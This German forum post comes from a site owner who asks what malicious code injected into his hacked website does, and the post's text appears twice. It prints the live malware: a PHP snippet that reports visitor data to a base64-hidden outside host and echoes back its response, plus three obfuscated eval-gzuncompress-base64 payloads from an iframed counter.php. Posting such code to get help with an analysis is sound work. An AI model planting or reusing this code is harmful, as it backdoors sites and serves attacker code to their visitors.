masterchris_99
Neuling
Hallo,
meine Webseite wurde anscheinend gehackt. Ich weiß leider noch nicht wie sie reingekommen sind aber darum soll es auch hier erstmal nicht gehen. Mich würde interessieren was da genau passiert?
So wie ich das sehe werden Daten an eine weitere Webseite (habe die url schon wieder vergessen aber es war so eine Browser-Übersichtsseite) geschickt und bei bestimmten Umständen (Browser, Host, ...) kommt ein "Schadcode" zurück der dann ausgeführt wird. Was wird ausgeführt?
Für mich sieht das sehr nach Bot aus der mich gescannt hat. Es hat sich also keiner händisch die Mühe gemacht und mich gehackt?!?
Dieser PHP-Code wurde direkt in die einzelnen PHP-Seiten eingefügt:
Dieser Code war in einer counter.php die per IFrame in HTML-Seiten eingebettet war:
mfg Chris
meine Webseite wurde anscheinend gehackt. Ich weiß leider noch nicht wie sie reingekommen sind aber darum soll es auch hier erstmal nicht gehen. Mich würde interessieren was da genau passiert?
So wie ich das sehe werden Daten an eine weitere Webseite (habe die url schon wieder vergessen aber es war so eine Browser-Übersichtsseite) geschickt und bei bestimmten Umständen (Browser, Host, ...) kommt ein "Schadcode" zurück der dann ausgeführt wird. Was wird ausgeführt?
Für mich sieht das sehr nach Bot aus der mich gescannt hat. Es hat sich also keiner händisch die Mühe gemacht und mich gehackt?!?
Dieser PHP-Code wurde direkt in die einzelnen PHP-Seiten eingefügt:
PHP:
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
Dieser Code war in einer counter.php die per IFrame in HTML-Seiten eingebettet war:
PHP:
eval(gzuncompress(base64_decode('eF6FUlFLwzAY/Cs+CNlAZLROKNKH+bAOGciibE1ESpMUIWYoKwjZrzf3bRNZUn2574O773o9clktH+9ny6cX1rQNey1nu13rR6rtu9ubxnT6w3QjpnPuDbu4ZlUB7AEqN06/lSUbX52pweocyD3tgOAQK0+q4A9NUnFkyDPtwf3w/e8sg/f07X/YwX84fIEyJPKf2J8ZtSW28718FpM6405k0FHH73JVYib6NfVDLzdTqzLqxsW9QgFKboBTgFXAPy5AH31JCeBJb1ICQgryt8CQJqEGI/K1V/PiU23dJM4q6KVAgVnsZc2/sNGrWYQS4sbOLiDElV5gS16AOKTA5rpqbWNfUCErBvJaVYU0K7zw8d03+PHhXg=='))); ?><?php eval(gzuncompress(base64_decode('eF5Vj9tqg0AQhl9FRDQBLyQlVyEUqZvY0sZ21ZKkFBnX0za6K+shSOm7dzf2pjfzzfGfmWJgpKecabAw6PLbgK0rBEwLy4+i1yQOEU7cPTpElq3rtlVyXta5ZVsTVJxLpkCzQbLpmLS8zQVIkkrwRrWllJUSHRQgqIp5L+1NGqMdwgjPuhi9BBFKXM+TibnuB6FcaoGPHeLx8Xn1NGb++/W83znn48E5HXFL7nB7mtZf6coZpV9lCM18WF/Bd7dy/J62Cv/1zaGTd5Y561XNzHgDlDFochXejvtbbhZDXbfQV7PGW4zCKInxo5oiVU4uKl9zfpFfBLqta/pyI/J+EEwz4MOgn5ufX/ghakE='))); ?><?php eval(gzuncompress(base64_decode('eF6FlG9rgzAQxr+KhWITWoqJ1rZIYN1wZeDakereiEi22a1QVuifV8Xvvkuqi6slEzR4/O7O3PPEzRp1NodDcURdIXIH4/PndvcmtpZ6DdST7Xen7w/k9AlWAcK682h5P4tWaS8XeS9LnQx181XIX0OeCuTg7AJStkiiSOW4TCBI36wRuk4mkCyrDgSiGDNmrcX2UGDbbpFUk66ZdDXpmUlPkyMzOdKkbyZ9TY7N5FiTEzM50eTUTE41SUDQxkAbGhGCs47UBEZ+BlUqD2gRiQsqQu5xfyos27bagKcBfL5o3JIWjAE9YLDWEFYflhYi5W+0HUNVBU9uwbUDLsj0FiKl1/WoNKOsR8ktWKrfgGkNuwDXO56HMZiayu0qK9OW/UllDRcHZQnDVJTVgelJ/8Nwro4LqQxCBw8Jj5Yvcc7DOOGLmM8Wq8eQD+oD5wzdP1f/3wCGb7zuVplMd4ufnsNlEv+2IcNRv3HLGrADj921SlUupOokKyitvhVnDOxEQWrlhWYcwj4OivevnfqreEHZqlt5FuqW5Q+LPD5x')));
mfg Chris